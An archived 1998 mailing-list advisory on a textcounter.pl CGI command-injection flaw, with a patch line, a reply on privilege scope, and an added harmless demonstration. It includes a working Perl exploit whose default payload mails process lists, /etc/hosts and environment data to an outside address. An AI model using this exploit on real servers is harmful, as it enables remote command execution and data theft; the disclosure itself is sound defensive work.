[ http://www.rootshell.com/ ]

Date: Wed, 24 Jun 1998 08:51:11 +0300
From: Doru Petrescu
Subject: textcounter.pl SECURITY HOLE

Hi,

I've found a serious problem in the textcounter.pl script that enables everybody to execute commands on your system with the same rights as the httpd daemon.

The program was created by Matt Wright (mattw@worldwidemart.com) and has a "Last Modified Date" of 5/10/96. You can find it at http://www.worldwidemart.com/scripts/.

The counter uses the environment variable DOCUMENT_URI to create/read/update a file where it keeps the hit count. There is NO test for shell metacharacters, so you can easily put something evil in it that will make PERL execute it ...

These are the two lines responsible for the problem ...

    if (-e "$data_dir$count_page") {
        open(COUNT,"$data_dir$count_page");
        ....
    }

Because of the test condition, the attack has to be repeated twice to succeed. The first time the condition is false and the tricky file gets created; the second time the condition is true and our commands get executed ... Nice, isn't it ? :(

The fix is very simple: add after line 91 another line that will make sure that there are NO tricky characters in the filename.

    $count_page = "$ENV{'DOCUMENT_URI'}";    # the original line 91
    ....
    $count_page =~ s/([^a-z0-9])/sprintf("%%%02X",$1)/ge;    # ADD THIS !!!!!

If you want to make sure whether your system is vulnerable or not, you can use the small program that is attached. No cracking please ...
Best regards,
------
Doru Petrescu
KappaNet - Software Engineer
E-mail: pdoru@kappa.ro

Exploit :

-- cut here --
#!/usr/bin/perl

$URL='http://dtp.kappa.ro/a/test.shtml';    # please _DO_ _modify_ this
$EMAIL='pdoru@pop3.kappa.ro,root';          # please _DO_ _modify_ this

# command to run on the target; default mails back ps, /etc/hosts and the
# environment (no '/' is used anywhere, hence the "cd ..;cd etc" dance)
if ($ARGV[0]) {
    $CMD=$ARGV[0];
}else{
    $CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothere_one";
}

# the trailing '|' makes the counter's two-argument open() a pipe open;
# IFS is set to '8' ("\8" is just '8' in a Perl double-quoted string) so
# that ${IFS} can stand in for the spaces a URL cannot carry
$text="${URL}/;IFS=\8;${CMD};echo|";
$text =~ s/ /\$\{IFS\}/g;
#print "$text\n";

# request twice: the first creates the count file, the second executes it
system({"wget"} "wget", $text, "-O/dev/null");
system({"wget"} "wget", $text, "-O/dev/null");

#system({"lynx"} "lynx", $text);
#system({"lynx"} "lynx", $text);
# if you don't have "wget"
# you can try with "Lynx"
-- cut here --

----------------------------------------------------------------------------

Date: Wed, 24 Jun 1998 03:35:57 -0400
From: Rich Lafferty
Subject: Re: textcounter.pl SECURITY HOLE

Quoting Doru Petrescu (pdoru@kappa.ro) from Wed, Jun 24, 1998 at 08:51:11AM +0300:
> Hi,
>
> I've found a serious problem in textcounter.pl script that enable
> everybody to execute commands on your system with the same rights as the
> httpd daemon.

Bah, that's what I get for writing things at 3:30 am. Regarding my previous post:

Yes, this script's vulnerability allows execution of arbitrary commands. The part about 'same rights as the httpd daemon' still implies poor configuration of httpd. Obviously, translate that to 'with the same rights as the user running this poorly-written prefabricated script' for a properly-configured httpd.

Use cgiwrap. Don't run scripts from untrusted sources. Don't take candy from strangers. Breathe.

-Rich

--
Rich Lafferty -----------+-------------------------------------------
Department of Sociology  | "Theory means you have ideas; ideology
McGill University        |  means ideas have you" -unknown anarchist
lafferty@pobox.com ------+-------------------------------------[mcq]-
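The two-request behaviour Doru describes in the first message, shown as an added demonstration that is not part of either post and is not textcounter.pl's own code. It is a small model of the counter's file handling: the count file name is built from DOCUMENT_URI and handed to a two-argument open(), first as-is and then with the posted one-line sanitizer applied. Assumptions of the model, not facts from the posts: the scratch directory stands in for $data_dir, slashes in the URI are mapped to '_' so the count file stays in one directory, the payload is constructed and calls the function directly (so it may contain spaces, which the exploit has to encode as ${IFS}), and ord() is added to the sanitizer because Perl's sprintf("%02X", ";") formats the string as the number 0 and prints "00" rather than "3B"; with or without ord() the metacharacters are gone.

```perl
#!/usr/bin/perl
# Added demonstration (not textcounter.pl and not the posted exploit): a small
# model of the counter's file handling, hit twice with a DOCUMENT_URI that
# carries shell metacharacters, then hit twice more with the sanitizer applied.
use strict;
use warnings;
use File::Temp qw(tempdir);

# Scratch directory standing in for $data_dir (assumption of this example).
# We chdir into it so the payload can name its marker file without a '/'.
my $data_dir = tempdir(CLEANUP => 1) . "/";
chdir $data_dir or die "chdir: $!";

# The one-line fix from the post. ord() is added so sprintf sees the
# character code (sprintf("%02X", ";") on the string itself prints "00").
sub sanitize_count_page {
    my ($page) = @_;
    $page =~ s/([^a-z0-9])/sprintf("%%%02X", ord($1))/ge;
    return $page;
}

# One request against the counter. Slashes are mapped to '_' so the count
# file stays inside $data_dir (this model's assumption; the exploit's
# "cd ..;cd etc;cat hosts" suggests the real script cannot carry '/' either).
sub hit {
    my ($uri, $sanitize) = @_;
    my $count_page = $uri;
    $count_page =~ s{/}{_}g;
    $count_page = sanitize_count_page($count_page) if $sanitize;
    my $file  = "$data_dir$count_page";
    my $count = 0;
    if (-e $file) {
        # Two-argument open(): a name whose last character is '|' is not a
        # file but a command line for /bin/sh, read from its stdout.
        open(COUNT, $file) or die "open: $!";
        my $line = <COUNT>;
        close(COUNT);
        $count = $1 if defined $line && $line =~ /^(\d+)$/;
    }
    $count++;
    # With a leading '>' the trailing '|' is literal, so this write creates a
    # file named after the payload; that file is what makes -e true next time.
    open(COUNT, ">$file") or die "create: $!";
    print COUNT "$count\n";
    close(COUNT);
    return $count;
}

# Constructed payload. Spaces are fine because hit() is called directly; an
# HTTP request path cannot carry them, which is why the exploit uses ${IFS}.
my $evil_uri = "/test.shtml;echo pwned >marker;echo|";

hit($evil_uri, 0);
printf "vulnerable, request 1: marker %s\n", (-e "marker" ? "written" : "absent");
hit($evil_uri, 0);   # sh complains about the first token, then runs the rest
printf "vulnerable, request 2: marker %s\n", (-e "marker" ? "written" : "absent");

unlink "marker";
hit($evil_uri, 1) for 1 .. 2;
printf "sanitized,  request 2: marker %s\n", (-e "marker" ? "written" : "absent");
printf "sanitized DOCUMENT_URI: %s\n", sanitize_count_page($evil_uri);

chdir "/";   # leave the scratch directory so CLEANUP can remove it
```

Run it with perl; the first vulnerable request reports the marker absent, the second reports it written, and the sanitized pair never writes it. During the second vulnerable request /bin/sh prints a "not found" error for the leading path component before running the rest of the line, which is exactly why the exploit's command string begins with "${URL}/;" and then puts its real commands after the semicolon. The asymmetry that forces two requests is visible in the two open() calls: ">$file" treats the trailing '|' as part of the file name, while the bare "$file" on the next request treats it as a pipe. As Rich notes, the resulting commands run as whatever user executes the CGI, the httpd user or the cgiwrap target.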